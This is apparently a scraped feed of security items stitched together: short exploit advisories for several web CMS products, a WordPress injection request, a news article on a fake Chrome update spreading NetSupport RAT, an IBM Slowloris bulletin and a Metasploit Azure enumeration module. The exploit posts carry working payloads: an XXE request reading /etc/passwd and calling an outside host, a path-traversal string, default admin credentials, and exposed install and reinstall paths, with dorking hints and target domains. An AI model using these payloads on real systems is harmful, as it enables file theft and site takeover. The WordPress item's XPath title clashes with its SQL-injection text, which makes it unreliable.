E-Fun CMS version 5.0 suffers from an XML external entity injection vulnerability.

====================================================================================================================================  
| # Title     : E-Fun CMS V5.0 XML external entity injection Vulnerability                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : http://www.e-fun.com.tw/                                                                                           |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

XML supports a facility known as "external entities",   
which instruct an XML processor to retrieve and perform   
an inline include of XML located at a particular URI.   
An external XML entity can be used to append or modify   
the document type declaration (DTD) associated with an   
XML document. An external XML entity can also be used   
to include XML within the content of an XML document. 

Now assume that the XML processor parses data originating   
from a source under attacker control. Most of the time   
the processor will not be validating, but it MAY include   
the replacement text thus initiating an unexpected file   
open operation, or HTTP transfer, or whatever system ids   
the XML processor knows how to access. 

below is a sample XML document that will use this functionality   
to include the contents of a local file (/etc/passwd)

target : http://127.0.0.1/landtopcomtw/webadmin/

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE indoushka [  
  <!ENTITY indoushka SYSTEM "file:///etc/passwd">  
]>  
<xxx>&indoushka;</xxx>

POST /webadmin/_chkpasswd.php HTTP/1.1  
Content-type: text/xml  
Host: landtop.com.tw  
Content-Length: 175  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE dt5fqyt [  
  <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">  
]>  
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>

[+] Affected items :

/webadmin/   
/webadmin/_chkpasswd.php   
/webadmin/index.php 

[+] The impact of this vulnerability :

Attacks can include disclosing local files,   
which may contain sensitive data such as passwords   
or private user data, using file: schemes or relative   
paths in the system identifier. Since the attack occurs   
relative to the application processing the XML document,   
an attacker may use this trusted application to pivot   
to other internal systems, possibly disclosing   
other internal content via http(s) requests.

[+] How to fix this vulnerability :

If possible it's recommended to disable parsing of XML external entities.

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

E-Fun CMS 5.0 XML Injection 

WordPress Core version 5.6.2 appears to suffer from an xpath injection vulnerability via the log parameter.

    # Exploit Title: WordPress Core 5.6.2 - Xpath Injection# Date: 13/08/2023# Exploit Author: Behrouz Mansoori# Vendor Homepage: https://wordpress.org# Software Link: https://wordpress.org/download/releases# Version: 5.6.2# Tested on: Mac# [ VULNERABILITY DETAILS ] : #This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries.#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.# [ Sample Request ] :POST /wp-login.php HTTP/2Host: localhostCookie: wordpress_test_cookie=WP%20Cookie%20checkContent-Length: 125Cache-Control: max-age=0Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9log=test' and extractvalue (rand(), concat (0x7e, version () ))--+&pwd=test&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=https%3A%2F%2Ftarget_site%2Fwp-admin%2F&testcookie=1

WordPress Core 5.6.2 XPath Injection

Education Time Indonesian School CRM version 1.7 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Education Time Indonesian School CRM v 1.7 Directory Traversal Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir                                                                                                   |  | # Dork      : "media.php?module=detailberita&id="                                                                                |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=../../../../../../../../../../etc/passwd[+]  http://target_site/unit/spi/downlot.php?file=../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Education Time Indonesian School CRM 1.7 Directory Traversal

By Waqas
Trellix Uncovers Deceptive Chrome Browser Update Campaign Leveraging NetSupport Manager RAT.
This is a post from HackRead.com Read the original post: Fake Chrome Browser Update Installs NetSupport Manager RAT

*   **Fake Chrome Browser Update Scam:** Trellix exposes a scheme using fake Chrome browser updates to sneak NetSupport Manager onto victim computers, granting cybercriminals control and data access.

*   **Possible SocGholish Link:** While resembling SocGholish, differences in tools raise doubt about a direct connection, highlighting evolving tactics.

*   **Compromised Sites as Launchpads:** Compromised websites act as launchpads for the attack, affecting diverse sectors, including government and finance.

*   **Deceptive Path to RAT:** Victims fall for the fake update, unknowingly downloading a malicious JavaScript file, “Browser\_portable.js,” which activates NetSupport Manager.

*   **Urgent Need for Vigilance:** Trellix’s discovery underscores the critical importance of global threat intelligence and advanced security solutions in countering evolving cyber threats.

Cybersecurity firm Trellix has identified a new cyber campaign exploiting unsuspecting victims by disguising itself as a legitimate Chrome browser update. The deceptive scheme employs a malicious remote administration tool (RAT) known as NetSupport Manager RAT, allowing threat actors to gain unauthorized access to victims’ computers and seize control.

Moreover, the Trellix Advanced Research Center uncovered striking similarities to a previously reported SocGholish campaign, although a definitive connection remains elusive. Yet, concrete links between the two campaigns remain scarce.

The campaign, which came to light in late June 2023, exploits compromised websites as a platform for delivering the fraudulent Chrome update. Victims are lured into downloading and installing the fake update, unwittingly inviting the NetSupport Manager RAT onto their systems. The malware allows cybercriminals to pilfer sensitive information and manipulate victim computers to their advantage.

The modus operandi of the campaign involves injecting compromised websites with a carefully crafted HTML script tag that retrieves JavaScript content from the attackers’ command and control server.

This technique, seemingly automated, hinges on the unsuspecting victims falling for the fake browser update ruse. The success of the scheme relies heavily on the prevalence of compromised websites.

Trellix researchers found evidence of this campaign infiltrating a Chamber of Commerce website, with traffic from governmental entities, financial institutions, and consulting services. Although the site has since been cleansed of the injected script, it suffered compromise for at least one day.

The deceptive journey commences when victims encounter the injected script on a compromised website, leading them to a fake browser update page. This manipulation, which directs users to unwittingly install the NetSupport RAT, isn’t novel; similar tactics have been documented in past instances like the SocGholish campaign.

Fake Chrome Browser Update page (Screenshot: Trellix)

However, it’s the tools employed in the present campaign that stand apart from SocGholish. SocGholish exploited PowerShell with WMI capabilities to facilitate RAT download and installation. In contrast, the current campaign utilizes batch files (.BAT), VB scripts, and the Curl tool to carry out its malevolent operations. The use of these distinct tools underscores the evolving strategies of cybercriminals.

Should a victim succumb to the allure of the fake browser update and click on the “Update Chrome” link, a ZIP archive named “UpdateInstall.zip” containing a malevolent JavaScript file, “Browser\_portable.js,” is initiated for download. This script serves as a downloader for the ensuing stage of the attack.

Upon extraction of the NetSupport Manager RAT via the downloaded 7-zip utility, execution transpires via a scheduled task, orchestrated by the “2.bat” batch file. Furthermore, this batch file also engenders persistence for the RAT, ensuring automatic execution upon system startup.

The malevolent configuration file (“client32.ini”) for the RAT reveals a gateway address set to 5.252.178.48. At this juncture, with the RAT firmly entrenched within the victim’s system, threat actors possess substantial control, enabling them to execute further malware deployment, data exfiltration, network reconnaissance, and lateral movement.

The infection chain (Screenshot: Trellix)

In conclusion, this campaign serves as a reminder that threat actors consistently exploit successful techniques to advance their malicious agendas. The deployment of familiar lures, such as the phony browser update, underscores the persistent nature of these attacks.

The proliferation of RATs, while not always updated, showcases their enduring utility for cybercriminals. As attackers adopt increasingly sophisticated tactics, the challenge of detection intensifies. The utilization of native Windows scripting languages, like VBScript and Batch script, combined with tools like Curl, exemplifies their adaptability and innovation.

Joseph Tal, Senior Vice President of Trellix’s Advanced Research Center, cautioned that the prevalence of these NetSupport RAT attacks underscores the need for comprehensive global threat intelligence and innovative security solutions.

Commenting on this, Dr Klaus Schenk, senior vice president, Security and Threat Research at Verimatrix told Hackread.com that _“_The reports of threat actors exploiting fake Chrome browser updates to spread the NetSupport Manager Remote Access Trojan are concerning. While the attack vector of abusing browser updates is common, this particular campaign stands out for its sophistication and targeting. The attribution to the SocGholish group, known for cyber espionage aligned with Russian state interests, makes this a high-priority threat._“_

_“_While the details connecting this attack to SocGholish are inconclusive, the examination by Trellix seems reliable. The threat actors clearly spent time crafting a credible lure using Chrome’s market dominance. I recommend to wait a bit to see if this attacks manifests — but it would be a good idea to prioritise incident response and user education to detect and mitigate this threat,” Tal added.

_“_Even though users must still click a malicious link, the sophistication of this attack makes it likely to evade defenses. We should continue monitoring for new developments, but organisations should act swiftly to harden systems, update browsers, and inform personnel about this threat,” Tal recommend.

Nevertheless, the continually evolving threat landscape necessitates a proactive and holistic approach to cybersecurity, particularly as more enterprises rely on Chromium-based browsers for their web applications.

**RELATED ARTICLES**

1.  New malware in pirated games disables Windows Updates
2.  Fake ROBLOX &Nintendo game cracks drop ChromeLoader malware
3.  Fake Chrome & Firefox browser update lead users to malware infection
4.  Over 20 million Chrome users have installed fake malicious Ad Blockers
5.  Big Head Ransomware Found in Malvertising and Fake Windows Updates

Fake Chrome Browser Update Installs NetSupport Manager RAT


IBM TXSeries for Multiplatforms 8.1, 8.2, and 9.1 is vulnerable to a denial of service, caused by improper enforcement of the timeout on individual read operations. By conducting a slowloris-type attacks, a remote attacker could exploit this vulnerability to cause a denial of service. IBM X-Force ID: 262905.



  

**Summary**

IBM TXSeries for Multiplatforms Web Services is vulnerable to Slowloris attack which is a type of denial-of-service (DoS). This issue has been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2023-38741  
**DESCRIPTION:**   IBM TXSeries for Multiplatforms is vulnerable to a denial of service, caused by improper enforcement of the timeout on individual read operations. By conducting a slowloris-type attacks, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/262905 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM TXSeries for Multiplatforms

8.1

IBM TXSeries for Multiplatforms

8.2

IBM TXSeries for Multiplatforms

9.1

**Remediation/Fixes**

Product

Version

Platform

Remediation/Fix

IBM TXSeries for Multiplatforms

8.1

Linux, AIX

Please follow the recommendations here 

IBM TXSeries for Multiplatforms

8.2

Linux, AIX, Windows, HP

Please follow the recommendations here 

IBM TXSeries for Multiplatforms

9.1

Linux, AIX

Please follow the recommendations here

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

11 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSAL2T","label":"TXSeries for Multiplatforms"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"},{"code":"PF010","label":"HP-UX"}\],"Version":"8.1, 8.2, 9.1","Edition":"","Line of Business":{"code":"LOB35","label":"Mainframe SW"}}\]

CVE-2023-38741: Security Bulletin: IBM TXSeries for Multiplatforms Web Services is vulnerable to Slowloris attack which is a type of denial-of-service (DoS)

xterm before 380 supports ReGIS reporting for character-set names even if they have unexpected characters (i.e., neither alphanumeric nor underscore), aka a pointer/overflow issue.

CVE-2023-40359: XTERM - Change Log

This is a Metasploit module for enumerating public Azure services by validating legitimate subdomains through various DNS record queries. This cloud reconnaissance module rapidly identifies API services, storage accounts, key vaults, databases, and more!

    *Background:*Microsoft makes use of a number of different domains and subdomains foreach of their Azure services. From SQL databases to SharePoint drives, eachservice maps to its respective domain/subdomain, and with the propertoolset, these can be identified through DNS enumeration to yieldinformation about the target domain's infrastructure.enum_azuresubdomains.rb is a Metasploit module for enumerating public Azureservices by validating legitimate subdomains through various DNS recordqueries. This cloud reconnaissance module rapidly identifies API services,storage accounts, key vaults, databases, and more! Expedite your cloudreconnaissance phases with enum_azuresubdomains.rb.*Code:*### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::DNS::Enumeration  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Azure Subdomain Scanner and Enumerator',        'Description' => 'This module can be used for enumerating publicAzure services by locating valid subdomains through various DNS queries.',        'Author' => ['RoseSecurity <RoseSecurityConsulting[at]protonmail.me>'],        'References' => ['www.netspi.com/blog/technical/cloud-penetration-testing/enumerating-azure-services'],        'License' => MSF_LICENSE      )      )    register_options(      [        OptString.new('DOMAIN', [true, 'The target domain without TLD (Ex:victim rather than victim.org)']),        OptBool.new('PERMUTATIONS',                    [false,                     'Prepend and append permutated keywords to domain',false]),        OptBool.new('ENUM_A', [true, 'Enumerate DNS A record', true]),        OptBool.new('ENUM_CNAME', [true, 'Enumerate DNS CNAME record',true]),        OptBool.new('ENUM_MX', [true, 'Enumerate DNS MX record', true]),        OptBool.new('ENUM_NS', [true, 'Enumerate DNS NS record', true]),        OptBool.new('ENUM_SOA', [true, 'Enumerate DNS SOA record', true]),        OptBool.new('ENUM_TXT', [true, 'Enumerate DNS TXT record', true])      ]    )  end  def dns_enum(target_domains)    target_domains.each do |domain|      next unless dns_get_a(domain)      print_good("Discovered Target Domain: #{domain} \n")      dns_get_a(domain) if datastore['ENUM_A']      dns_get_cname(domain) if datastore['ENUM_CNAME']      dns_get_ns(domain) if datastore['ENUM_NS']      dns_get_mx(domain) if datastore['ENUM_MX']      dns_get_soa(domain) if datastore['ENUM_SOA']      dns_get_txt(domain) if datastore['ENUM_TXT']    end  end  def run    # Array of subdomains to enumerate    domain = datastore['DOMAIN']    subdomains = [      '.onmicrosoft.com',      '.scm.azurewebsites.net',      '.azurewebsites.net',      '.p.azurewebsites.net',      '.cloudapp.net',      '.file.core.windows.net',      '.blob.core.windows.net',      '.queue.core.windows.net',      '.table.core.windows.net',      '.mail.protection.outlook.com',      '.sharepoint.com',      '.redis.cache.windows.net',      '.documents.azure.com',      '.database.windows.net',      '.vault.azure.net',      '.azureedge.net',      '.search.windows.net',      '.azure-api.net',      '.azurecr.io'    ]    # Array of keywords to prepend and append    permutations = %w[      root      web      api      azure      azure-logs      data      database      data-private      data-public      dev      development      demo      files      filestorage      internal      keys      logs      private      prod      production      public      service      services      splunk      sql      staging      storage      storageaccount      test      useast      useast2      centralus      northcentralus      westcentralus      westus      westus2    ]    # Create permutated array of keywords and target domain    if datastore['PERMUTATIONS']      permutated_domains = []      permutations.each do |keywords|        permutated_domains.append("#{domain}-#{keywords}")        permutated_domains.append("#{keywords}-#{domain}")      end      # Permutated and Normal list of subdomains      target_domains = []      subdomains.each do |tld|        target_domains.append(domain + tld)        permutated_domains.each do |_subdomain|          target_domains.append(domain + tld)        end      end      # Query DNS records of permutated and normal target subdomains    else      # Query DNS records of normal target subdomains      target_domains = []      subdomains.each do |tld|        target_domains.append(domain + tld)      end    end    dns_enum(target_domains)  endend

Microsoft Azure Subdomain Scanner / Enumerator

BookingWizz version 6.0.1 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : BookingWizz v6.0.1 sensitive information disclosure Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/booking-system/87919?s_rank=9                                                          |  | # Dork      : "BookingWizz v6.0"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The error is from the developer, as it does not warn you to delete the installation file after completion, or it is deleted automatically.[+] When you add install file they show you the real user and pass for admin panel.[+] Use Payload : /install.php[+] https://127.0.0.1therazorsedgebarberscom/tiff/install.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BookingWizz 6.0.1 Information Disclosure

E-commerce Growisei CMS version 2.0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : E-commerce Growisei CMS v2.0 insecure Settings Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.growiseit.com/                                                                                         |  | # Dork      :  Growise InfoTech. All Rights Reserved.                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = admin[+] Panel : https://127.0.0.1/khakipacketcom/admin/dashboardGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

E-commerce Growisei CMS 2.0 Insecure Settings

DBCInfoTech CMS version 2.0 suffers from an unauthenticated administrator reinstall vulnerability.

    ====================================================================================================================================| # Title     : dbcinfotech CMS v2.0 Reinstall Script Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://www.themeslide.com/whizclassified-classifieds-cms/                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Reinstall the site manager settings including resetting a new password.    because after the first installation, The setup file was not deleted automatically or by the website owner.    the installation file repeats the installation process.[+] use payload : /index.php/en/install/accountsetup[+] http://127.0.0.1/aphroditepaphiascom/index.php/en/install/accountsetupGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows